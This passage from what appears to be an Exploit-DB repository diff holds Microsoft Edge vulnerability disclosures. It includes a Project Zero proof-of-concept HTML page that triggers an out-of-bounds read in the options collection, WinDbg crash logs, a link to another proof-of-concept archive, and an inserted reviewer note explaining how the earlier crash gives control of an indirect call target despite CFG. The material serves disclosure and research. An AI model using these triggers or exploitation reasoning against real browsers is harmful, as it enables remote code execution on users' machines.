17 000000eb`c42fb560 00007ffa`9c95cec7 chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x15d
18 000000eb`c42fb600 00007ffa`9c960f52 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xa7
19 000000eb`c42fb680 00007ffa`9c95f1b2 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x132
1a 000000eb`c42fb710 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x142
1b 000000eb`c42fb770 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
1c 000000eb`c42fbad0 00000284`bf4b0fa2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
1d 000000eb`c42fbb20 00007ffa`9c9e9073 0x00000284`bf4b0fa2
1e 000000eb`c42fbb50 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93
1f 000000eb`c42fbba0 00007ffa`9c95abc0 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
20 000000eb`c42fbc00 00007ffa`9c95f65d chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
21 000000eb`c42fbc50 00007ffa`9c95f217 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
22 000000eb`c42fbce0 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x1a7
23 000000eb`c42fbd40 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
24 000000eb`c42fc090 00000284`bf4b0faa chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
25 000000eb`c42fc0e0 00007ffa`9c9e9073 0x00000284`bf4b0faa
26 000000eb`c42fc110 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93
27 000000eb`c42fc160 00007ffa`9c98ce3c chakra!Js::JavascriptFunction::CallFunction<1>+0x83
28 000000eb`c42fc1c0 00007ffa`9c98c406 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
29 000000eb`c42fc2b0 00007ffa`9c9ce4d9 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
2a 000000eb`c42fc320 00007ffa`9c9928a1 chakra!ScriptSite::CallRootFunction+0xb5
2b 000000eb`c42fc3c0 00007ffa`9c98e45c chakra!ScriptSite::Execute+0x131
2c 000000eb`c42fc450 00007ffa`9d333b2d chakra!ScriptEngineBase::Execute+0xcc
2d 000000eb`c42fc4f0 00007ffa`9d333a78 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
2e 000000eb`c42fc540 00007ffa`9d35ac27 edgehtml!CJScript9Holder::ExecuteCallback+0x18
2f 000000eb`c42fc580 00007ffa`9d35aa17 edgehtml!CListenerDispatch::InvokeVar+0x1fb
30 000000eb`c42fc700 00007ffa`9d33247a edgehtml!CListenerDispatch::Invoke+0xdb
31 000000eb`c42fc780 00007ffa`9d415a62 edgehtml!CEventMgr::_InvokeListeners+0x2ca
32 000000eb`c42fc8e0 00007ffa`9d290715 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
33 000000eb`c42fc910 00007ffa`9d2901a3 edgehtml!CEventMgr::Dispatch+0x405
34 000000eb`c42fcbe0 00007ffa`9d37434a edgehtml!CEventMgr::DispatchEvent+0x73
35 000000eb`c42fcc30 00007ffa`9d3ac5a2 edgehtml!COmWindowProxy::Fire_onload+0x14e
36 000000eb`c42fcd40 00007ffa`9d3ab23e edgehtml!CMarkup::OnLoadStatusDone+0x376
37 000000eb`c42fce00 00007ffa`9d3aa72f edgehtml!CMarkup::OnLoadStatus+0x112
38 000000eb`c42fce30 00007ffa`9d328d93 edgehtml!CProgSink::DoUpdate+0x3af
39 000000eb`c42fd2c0 00007ffa`9d32a550 edgehtml!GlobalWndOnMethodCall+0x273
3a 000000eb`c42fd3c0 00007ffa`b7a31c24 edgehtml!GlobalWndProc+0x130
3b 000000eb`c42fd480 00007ffa`b7a3156c user32!UserCallWinProcCheckWow+0x274
3c 000000eb`c42fd5e0 00007ffa`9347d421 user32!DispatchMessageWorker+0x1ac
3d 000000eb`c42fd660 00007ffa`9347c9e1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
3e 000000eb`c42ff8b0 00007ffa`ad7e9586 EdgeContent!LCIETab_ThreadProc+0x2c1
3f 000000eb`c42ff9d0 00007ffa`b7978364 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
40 000000eb`c42ffa00 00007ffa`ba0a70d1 KERNEL32!BaseThreadInitThunk+0x14
41 000000eb`c42ffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21

0:013> r
rax=00000284bc287fd8 rbx=00000284bc287f90 rcx=00000000abcdbbbb
rdx=0000000000000000 rsi=0000000000000017 rdi=0000000000000000
rip=00007ffa9d5f15ea rsp=000000ebc42f8da0 rbp=000000ebc42f8fb0
r8=0000000000000017 r9=000000ebc42f8e78 r10=00000fff53a47750
r11=0000000000010000 r12=0000027cb4fbcd10 r13=0000027cb4f95a78
r14=000000ebc42f8e70 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=????????????????

0:013> u 00007ffa`9d5f15ea
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx]
00007ffa`9d5f15ed 488b80d0050000 mov rax,qword ptr [rax+5D0h]
00007ffa`9d5f15f4 ff15c654ab00 call qword ptr [edgehtml!_guard_dispatch_icall_fptr (00007ffa`9e0a6ac0)]

=========================================


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42758.zip
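Review bot: the text says "I'm attaching all of the required code. Simply run server.py", but this file contains only the prose and the debug log; server.py and the page it serves are reachable only through the bin-sploits zip link at the very end, so that sentence should point to the link. Typos in the prose: "afer", "preceeds". The `u` listing is the evidence for the exploitability claim and deserves one sentence of explanation instead of "demonstrates the exploitability" alone: the faulting `mov rax,[rcx]` (rcx=00000000`abcdbbbb) loads a pointer, `[rax+5D0h]` reads a function pointer through it, and that pointer goes straight to `_guard_dispatch_icall_fptr`, so whoever controls the object behind rcx picks the call target; worth adding that CFG validates only that the target is a permitted indirect-call entry, not which one, which is why the CFG protection does not by itself close this off. Everything else in the log (frames 00 to 41, the register dump) matches the `k` and `r` output format and can stay as is.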
platforms/windows/dos/42759.html (Executable file, 230 lines added)
|
@ -0,0 +1,230 @@
|
|||
<!--
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1301
|
||||
|
||||
There is an out-of-bounds read issue in Microsoft Edge that could potentially be turned into remote code execution. The vulnerability has been confirmed on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393) as well as Microsoft Edge 40.15063.0.0 (Microsoft EdgeHTML 15.15063).
|
||||
|
||||
PoC:
|
||||
|
||||
==========================================
|
||||
-->
|
||||
|
||||
<!-- saved from url=(0014)about:internet -->
|
||||
<script>
|
||||
function go() {
|
||||
select1.multiple = false;
|
||||
var optgroup = document.createElement("optgroup");
|
||||
select1.add(optgroup);
|
||||
var options = select1.options;
|
||||
select2 = document.createElement("select");
|
||||
textarea.setSelectionRange(0,1000000);
|
||||
select1.length = 2;
|
||||
document.getElementsByTagName('option')[0].appendChild(textarea);
|
||||
select1.multiple = true;
|
||||
textarea.setSelectionRange(0,1000000);
|
||||
document.execCommand("insertOrderedList", false);
|
||||
select2.length = 100;
|
||||
select2.add(optgroup);
|
||||
//alert(options.length);
|
||||
var test = options[4];
|
||||
//alert(test);
|
||||
}
|
||||
</script>
|
||||
<body onload=go()>
|
||||
<textarea id="textarea"></textarea>
|
||||
<select id="select1" contenteditable="true"></select>
|
||||
|
||||
<!--
|
||||
=========================================
|
||||
|
||||
Preliminary analysis:
|
||||
|
||||
When opening the PoC in Edge under normal circumstances, the content process will occasionally crash somewhere inside Js::CustomExternalObject::GetItem (see Debug Log 1 below) which corresponds to 'var test = options[4];' line in the PoC. Note that multiple page refreshes are usually needed to get the crash.
|
||||
|
||||
The real cause of the crash can be seen if Page Heap is applied to the MicrosoftEdgeCP.exe process and MemGC is disabled with OverrideMemoryProtectionSetting=0 registry flag (otherwise Page Heap settings won't apply to the MemGC heap). In that case an out-of-bounds read can be reliably observed in COptionsCollectionCacheItem::GetAt function (see Debug Log 2 below). What happens is that Edge thinks 'options' array contains 102 elements (this can be verified by uncommenting 'alert(options.length);' line in the PoC), however in reality the Options cache buffer is going to be smaller and only contain 2 elements. Thus if an attacker requests an object that is past the end of the cache buffer (note: the offset is chosen by the attacker) an incorrect object may be returned which can potentially be turned into a remote code execution.
|
||||
|
||||
Note: Debug logs were obtained on an older version of Edge for which symbols were available. However I verified that the bug also affects the latest version.

Debug log 1:

=========================================

(1790.17bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chakra!Js::CrossSite::MarshalVar+0x37:
00007ffa`c8dc23f7 488b4808 mov rcx,qword ptr [rax+8] ds:00000001`afccb7dc=????????????????

0:010> k
# Child-SP RetAddr Call Site
00 00000071`3ecfb090 00007ffa`c8dc0c92 chakra!Js::CrossSite::MarshalVar+0x37
01 00000071`3ecfb0c0 00007ffa`c8d959c8 chakra!Js::CustomExternalObject::GetItem+0x1c2
02 00000071`3ecfb1a0 00007ffa`c8d92d84 chakra!Js::JavascriptOperators::GetItem+0x78
03 00000071`3ecfb200 00007ffa`c8dfc1e0 chakra!Js::JavascriptOperators::GetElementIHelper+0xb4
04 00000071`3ecfb290 00007ffa`c8d85ac1 chakra!Js::JavascriptOperators::OP_GetElementI+0x1c0
05 00000071`3ecfb2f0 00007ffa`c8d8933f chakra!Js::ProfilingHelpers::ProfiledLdElem+0x1b1
06 00000071`3ecfb380 00007ffa`c8d8e639 chakra!Js::InterpreterStackFrame::OP_ProfiledGetElementI<Js::OpLayoutT_ElementI<Js::LayoutSizePolicy<0> > >+0x5f
07 00000071`3ecfb3c0 00007ffa`c8d8c852 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x179
08 00000071`3ecfb450 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x142
09 00000071`3ecfb4b0 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
0a 00000071`3ecfb860 000001b7`d68e0fb2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0b 00000071`3ecfb8b0 00007ffa`c8e77273 0x000001b7`d68e0fb2
0c 00000071`3ecfb8e0 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
0d 00000071`3ecfb930 00007ffa`c8d88260 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0e 00000071`3ecfb990 00007ffa`c8d8ccfd chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
0f 00000071`3ecfb9e0 00007ffa`c8d8c8b7 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
10 00000071`3ecfba70 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x1a7
11 00000071`3ecfbad0 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
12 00000071`3ecfbe20 000001b7`d68e0fba chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
13 00000071`3ecfbe70 00007ffa`c8e77273 0x000001b7`d68e0fba
14 00000071`3ecfbea0 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
15 00000071`3ecfbef0 00007ffa`c8dba4bc chakra!Js::JavascriptFunction::CallFunction<1>+0x83
16 00000071`3ecfbf50 00007ffa`c8db9a86 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
17 00000071`3ecfc040 00007ffa`c8e5c359 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
18 00000071`3ecfc0b0 00007ffa`c8dbff21 chakra!ScriptSite::CallRootFunction+0xb5
19 00000071`3ecfc150 00007ffa`c8dbbadc chakra!ScriptSite::Execute+0x131
1a 00000071`3ecfc1e0 00007ffa`c97d08dd chakra!ScriptEngineBase::Execute+0xcc
1b 00000071`3ecfc280 00007ffa`c97d0828 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
1c 00000071`3ecfc2d0 00007ffa`c970a8c7 edgehtml!CJScript9Holder::ExecuteCallback+0x18
1d 00000071`3ecfc310 00007ffa`c970a6b7 edgehtml!CListenerDispatch::InvokeVar+0x1fb
1e 00000071`3ecfc490 00007ffa`c97cf22a edgehtml!CListenerDispatch::Invoke+0xdb
1f 00000071`3ecfc510 00007ffa`c98a40d2 edgehtml!CEventMgr::_InvokeListeners+0x2ca
20 00000071`3ecfc670 00007ffa`c9720ac5 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
21 00000071`3ecfc6a0 00007ffa`c9720553 edgehtml!CEventMgr::Dispatch+0x405
22 00000071`3ecfc970 00007ffa`c97fd8da edgehtml!CEventMgr::DispatchEvent+0x73
23 00000071`3ecfc9c0 00007ffa`c983ba12 edgehtml!COmWindowProxy::Fire_onload+0x14e
24 00000071`3ecfcad0 00007ffa`c983a6a6 edgehtml!CMarkup::OnLoadStatusDone+0x376
25 00000071`3ecfcb90 00007ffa`c983a21f edgehtml!CMarkup::OnLoadStatus+0x112
26 00000071`3ecfcbc0 00007ffa`c97c5b43 edgehtml!CProgSink::DoUpdate+0x3af
27 00000071`3ecfd050 00007ffa`c97c7300 edgehtml!GlobalWndOnMethodCall+0x273
28 00000071`3ecfd150 00007ffa`e7571c24 edgehtml!GlobalWndProc+0x130
29 00000071`3ecfd210 00007ffa`e757156c user32!UserCallWinProcCheckWow+0x274
2a 00000071`3ecfd370 00007ffa`c0cccdf1 user32!DispatchMessageWorker+0x1ac
2b 00000071`3ecfd3f0 00007ffa`c0ccc3b1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
2c 00000071`3ecff640 00007ffa`dd649596 EdgeContent!LCIETab_ThreadProc+0x2c1
2d 00000071`3ecff760 00007ffa`e4f58364 iertutil!SettingStore::CSettingsBroker::SetValue+0x246
2e 00000071`3ecff790 00007ffa`e77d70d1 KERNEL32!BaseThreadInitThunk+0x14
2f 00000071`3ecff7c0 00000000`00000000 ntdll!RtlUserThreadStart+0x21

0:010> r
rax=00000001afccb7d4 rbx=000001b7d669fd80 rcx=ffff000000000000
rdx=00000001afccb7d4 rsi=000001afce6556d0 rdi=000000713ecfb250
rip=00007ffac8dc23f7 rsp=000000713ecfb090 rbp=000000713ecfb141
r8=0000000000000000 r9=000001b7d8a94bd0 r10=0000000000000005
r11=000001b7d9ebcee0 r12=0000000000000003 r13=0001000000000004
r14=0000000000000004 r15=000001afce6556d0
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::CrossSite::MarshalVar+0x37:
00007ffa`c8dc23f7 488b4808 mov rcx,qword ptr [rax+8] ds:00000001`afccb7dc=????????????????

=========================================


Debug log 2 (with Page Heap on for MicrosoftEdgeCP.exe and MemGC disabled):

=========================================

(de8.13c8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!COptionsCollectionCacheItem::GetAt+0x51:
00007ffa`c96b1581 488b04d0 mov rax,qword ptr [rax+rdx*8] ds:000001b6`52743000=????????????????

0:010> k
# Child-SP RetAddr Call Site
00 00000091`94ffb2c0 00007ffa`c9569bb2 edgehtml!COptionsCollectionCacheItem::GetAt+0x51
01 00000091`94ffb2f0 00007ffa`c8dc0c51 edgehtml!CElementCollectionTypeOperations::GetOwnItem+0x122
02 00000091`94ffb330 00007ffa`c8d959c8 chakra!Js::CustomExternalObject::GetItem+0x181
03 00000091`94ffb410 00007ffa`c8d92d84 chakra!Js::JavascriptOperators::GetItem+0x78
04 00000091`94ffb470 00007ffa`c8dfc1e0 chakra!Js::JavascriptOperators::GetElementIHelper+0xb4
05 00000091`94ffb500 00007ffa`c8d85ac1 chakra!Js::JavascriptOperators::OP_GetElementI+0x1c0
06 00000091`94ffb560 00007ffa`c8d8933f chakra!Js::ProfilingHelpers::ProfiledLdElem+0x1b1
07 00000091`94ffb5f0 00007ffa`c8d8e639 chakra!Js::InterpreterStackFrame::OP_ProfiledGetElementI<Js::OpLayoutT_ElementI<Js::LayoutSizePolicy<0> > >+0x5f
08 00000091`94ffb630 00007ffa`c8d8c852 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x179
09 00000091`94ffb6c0 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x142
0a 00000091`94ffb720 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
0b 00000091`94ffbad0 000001b6`4f600fb2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0c 00000091`94ffbb20 00007ffa`c8e77273 0x000001b6`4f600fb2
0d 00000091`94ffbb50 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
0e 00000091`94ffbba0 00007ffa`c8d88260 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0f 00000091`94ffbc00 00007ffa`c8d8ccfd chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
10 00000091`94ffbc50 00007ffa`c8d8c8b7 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
11 00000091`94ffbce0 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x1a7
12 00000091`94ffbd40 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
13 00000091`94ffc090 000001b6`4f600fba chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
14 00000091`94ffc0e0 00007ffa`c8e77273 0x000001b6`4f600fba
15 00000091`94ffc110 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
16 00000091`94ffc160 00007ffa`c8dba4bc chakra!Js::JavascriptFunction::CallFunction<1>+0x83
17 00000091`94ffc1c0 00007ffa`c8db9a86 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
18 00000091`94ffc2b0 00007ffa`c8e5c359 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
19 00000091`94ffc320 00007ffa`c8dbff21 chakra!ScriptSite::CallRootFunction+0xb5
1a 00000091`94ffc3c0 00007ffa`c8dbbadc chakra!ScriptSite::Execute+0x131
1b 00000091`94ffc450 00007ffa`c97d08dd chakra!ScriptEngineBase::Execute+0xcc
1c 00000091`94ffc4f0 00007ffa`c97d0828 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
1d 00000091`94ffc540 00007ffa`c970a8c7 edgehtml!CJScript9Holder::ExecuteCallback+0x18
1e 00000091`94ffc580 00007ffa`c970a6b7 edgehtml!CListenerDispatch::InvokeVar+0x1fb
1f 00000091`94ffc700 00007ffa`c97cf22a edgehtml!CListenerDispatch::Invoke+0xdb
20 00000091`94ffc780 00007ffa`c98a40d2 edgehtml!CEventMgr::_InvokeListeners+0x2ca
21 00000091`94ffc8e0 00007ffa`c9720ac5 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
22 00000091`94ffc910 00007ffa`c9720553 edgehtml!CEventMgr::Dispatch+0x405
23 00000091`94ffcbe0 00007ffa`c97fd8da edgehtml!CEventMgr::DispatchEvent+0x73
24 00000091`94ffcc30 00007ffa`c983ba12 edgehtml!COmWindowProxy::Fire_onload+0x14e
25 00000091`94ffcd40 00007ffa`c983a6a6 edgehtml!CMarkup::OnLoadStatusDone+0x376
26 00000091`94ffce00 00007ffa`c983a21f edgehtml!CMarkup::OnLoadStatus+0x112
27 00000091`94ffce30 00007ffa`c97c5b43 edgehtml!CProgSink::DoUpdate+0x3af
28 00000091`94ffd2c0 00007ffa`c97c7300 edgehtml!GlobalWndOnMethodCall+0x273
29 00000091`94ffd3c0 00007ffa`e7571c24 edgehtml!GlobalWndProc+0x130
2a 00000091`94ffd480 00007ffa`e757156c user32!UserCallWinProcCheckWow+0x274
2b 00000091`94ffd5e0 00007ffa`c0d2cdf1 user32!DispatchMessageWorker+0x1ac
2c 00000091`94ffd660 00007ffa`c0d2c3b1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
2d 00000091`94fff8b0 00007ffa`dd649596 EdgeContent!LCIETab_ThreadProc+0x2c1
2e 00000091`94fff9d0 00007ffa`e4f58364 iertutil!SettingStore::CSettingsBroker::SetValue+0x246
2f 00000091`94fffa00 00007ffa`e77d70d1 KERNEL32!BaseThreadInitThunk+0x14
30 00000091`94fffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21

0:010> r
rax=000001b652742fe0 rbx=0000000000000004 rcx=000001b64f877f30
rdx=0000000000000004 rsi=0000000000000000 rdi=000001b651ecffd0
rip=00007ffac96b1581 rsp=0000009194ffb2c0 rbp=000001b64f3bcc60
r8=0000000000000005 r9=000001b651ed9e50 r10=0000000000000005
r11=000001b65343ef20 r12=0000009194ffb370 r13=0001000000000004
r14=0000000000000000 r15=0000000000000004
iopl=0 nv up ei ng nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
edgehtml!COptionsCollectionCacheItem::GetAt+0x51:
00007ffa`c96b1581 488b04d0 mov rax,qword ptr [rax+rdx*8] ds:000001b6`52743000=????????????????

0:010> !heap -p -a 000001b6`52742ff0
address 000001b652742ff0 found in
_DPH_HEAP_ROOT @ 1ae3fae1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1b652a5fd68: 1b652742fe0 20 - 1b652742000 2000
00007ffae783fd99 ntdll!RtlDebugAllocateHeap+0x000000000003bf65
00007ffae782db7c ntdll!RtlpAllocateHeap+0x0000000000083fbc
00007ffae77a8097 ntdll!RtlpAllocateHeapInternal+0x0000000000000727
00007ffac9958547 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x0000000000010457
00007ffac96d1483 edgehtml!CImplAry::EnsureSizeWorker+0x0000000000000093
00007ffac9882261 edgehtml!CImplPtrAry::Append+0x0000000000000051
00007ffac9589543 edgehtml!CSelectElement::AppendOption+0x000000000000002f
00007ffac95892e1 edgehtml!CSelectElement::BuildOptionsCache+0x00000000000000e1
00007ffac9e7f044 edgehtml!CSelectElement::Morph+0x00000000000000d0
00007ffac9a4e7cf edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x00000000001066df
00007ffac9605f85 edgehtml!SetNumberPropertyHelper<long,CSetIntegerPropertyHelper>+0x0000000000000255
00007ffac9605d23 edgehtml!NUMPROPPARAMS::SetNumberProperty+0x000000000000003b
00007ffac9605bda edgehtml!CBase::put_BoolHelper+0x000000000000004a
00007ffac9c6f1d1 edgehtml!CFastDOM::CHTMLSelectElement::Trampoline_Set_multiple+0x000000000000013d
00007ffac9916b55 edgehtml!CFastDOM::CHTMLSelectElement::Profiler_Set_multiple+0x0000000000000025
00007ffac8ce6d07 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000000000000177
00007ffac8dc2640 chakra!Js::LeaveScriptObject<1,1,0>::LeaveScriptObject<1,1,0>+0x0000000000000180
00007ffac8e62209 chakra!Js::JavascriptOperators::CallSetter+0x00000000000000a9
00007ffac8de7151 chakra!Js::CacheOperators::TrySetProperty<1,1,1,1,1,1,0,1>+0x00000000000002d1
00007ffac8de6ce6 chakra!Js::ProfilingHelpers::ProfiledStFld<0>+0x00000000000000d6
00007ffac8d89a70 chakra!Js::InterpreterStackFrame::OP_ProfiledSetProperty<Js::OpLayoutT_ElementCP<Js::LayoutSizePolicy<0> > const >+0x0000000000000070
00007ffac8d8e800 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x0000000000000340
00007ffac8d8c852 chakra!Js::InterpreterStackFrame::Process+0x0000000000000142
00007ffac8d90920 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x00000000000004a0
00007ffac8d92065 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x0000000000000055
000001b64f600fb2 +0x000001b64f600fb2

=========================================
-->